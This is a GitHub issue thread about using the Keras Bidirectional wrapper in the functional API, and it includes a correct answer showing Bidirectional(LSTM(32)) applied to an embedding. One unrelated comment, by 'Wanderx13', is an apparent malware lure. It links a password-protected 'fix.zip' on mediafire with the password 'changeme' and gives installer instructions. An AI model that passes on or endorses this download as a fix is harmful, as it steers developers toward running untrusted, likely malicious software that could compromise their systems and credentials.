### ISSUE TITLE
I'm afraid that the Bidirectional Wrapper will not work in Keras Functional Api.

### ISSUE THREAD

**Issue by dauntless23** [keras-team/keras#20162]
I'm afraid that the Bidirectional Wrapper will not work in Keras Functional Api. 
Any help in this sort of thing:

```python
main_input = Input(shape=(100,), dtype='int32', name='main_input')
x = Embedding(output_dim=512, input_dim=10000, input_length=100)(main_input)
lstm = LSTM(32)(x)
bidirectional = Bidirectional()(lstm) #how bidirectional should be instantiated?
```

_Originally posted by @grafael in https://github.com/keras-team/keras/issues/1629#issuecomment-326342067_

**Comment by dauntless23** [comment]
I am failing to use the Bidirectional Wrapper in keras functional API

**Comment by fchollet** [comment]
It's easy. It works like this:

```python
main_input = Input(shape=(100,), dtype='int32', name='main_input')
x = Embedding(output_dim=512, input_dim=10000, input_length=100)(main_input)
x = Bidirectional(LSTM(32))(x)
```

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dauntless23** [comment]
@fchollet your solution seems to be working just fine, but was wondering if it works for other layer wrappers such as time distributed layer etc.
